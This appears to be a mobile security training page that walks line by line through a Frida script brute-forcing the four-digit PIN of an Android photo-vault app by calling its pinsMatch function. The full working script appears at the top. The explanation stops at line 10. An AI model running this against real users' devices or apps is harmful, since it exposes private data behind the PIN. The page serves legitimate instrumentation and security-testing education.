[4c.1] PIN bruteforce (in depth)
This page is intended to cover how the PIN bruteforce works and how it all goes together.
The requirements of our bruteforcing function can be summed up as: iterate every possible combinations of PINs, starting with 0000 and working our way up to 9999, and invoke the pinsMatch function on each combination until we get a true result.
1
function bruteforcePIN() {
2
Java.perform(() => {
3
var CryptoUtils = Java.use('com.github.browep.privatephotovault.crypto.CryptoUtils');
4
var StringUtils = Java.use('org.apache.commons.lang.StringUtils');
5
var context = getApplicationContext();
6
for (var i = 0; i < 10000; i++) {
7
if (i % 1000 == 0) {
8
console.log('Tried', i, 'PINs');
9
}
10
var currentPin = StringUtils.leftPad(i.toString(), 4, '0');
11
if (CryptoUtils.pinsMatch(currentPin, 'pin', context)) {
12
console.log('found it!', currentPin);
13
break;
14
}
15
}
16
});
17
}
Copied!

Line 2 - Java.perform

1
Java.perform(() => {
2
// do stuff
3
});
Copied!
Wrapping code in a Java.perform are a necessary evil whenever we use frida on Android. You can bank on needing to wrap just about every call you make inside of one.
The good news is, frida will let you know quite definitively if you forget.

Lines 3 and 4 - Java.use

1
var CryptoUtils = Java.use('com.github.browep.privatephotovault.crypto.CryptoUtils');
2
var StringUtils = Java.use('org.apache.commons.lang.StringUtils');
Copied!
Java.use statements are necessary whenever you want to interact with Java classes. This goes for both classes that are part of the target app, and also classes that are part of the standard libraries. Java.use provides a wrapper with which you can do fun things with like invoking functions!
In this case, we are obtaining two wrappers: CryptoUtils, and StringUtils. If you consider the namespaces, you may note that StringUtils is not part of the "privatephotovault" but rather part of the Apache Commons library.

Line 5 - getApplicationContext()

1
var context = getApplicationContext();
Copied!
At the risk of delving too far into the programming concepts, I want to explain the purpose of this call very simply to start: we need a Context to pass to our pinsMatch function (argument 3). That's it. That's the only reason!
Ok, that makes sense, but what is a Context? Essentially, every single Android app is going to have Application Context. This article on mindorks.com provides a decent explanation.
One last thing -- the getApplicationContext function is actually defined earlier in our privatePhotoVault.js script.
1
function getApplicationContext() {
2
const ActivityThread = Java.use("android.app.ActivityThread");
3
const currentApplication = ActivityThread.currentApplication();
4
5
var ret = currentApplication.getApplicationContext();
6
return ret;
7
}
Copied!
As you can see, it is doing more of the same of what we've done earlier in the script. We're getting a wrapper to android.app.ActivityThread, then invoking two functions and ultimately returning our Application Context.

Line 6 - For loop

1
for (var i = 0; i < 10000; i++) {
2
// Loop stuff...
3
}
Copied!
Now we finally get to the good stuff! This loop starts at 0, and works its way up to 9999, and incrementing by one at a time.

Lines 7-9 - Update Progress

1
if (i % 1000 == 0) {
2
console.log('Tried', i, 'PINs');
3
}
Copied!
This section isn't necessary -- it's just for information. Every 1000 entries, we want to let the console know how many tries we've done.
If you're wondering what the % operator is, it's called modulo. Essentially, what if anything left over after dividing by a number.

Line 10 - Preparing our PIN attempt

1
var currentPin = StringUtils.leftPad(i.toString(), 4, '0');
Copied!
We're tantalizingly close to trying our PIN now! We have one final step: currently, our loop is counting from 0 to 9999, but the passcode we need to try is "0000", "0001", etc.
Last modified 1yr ago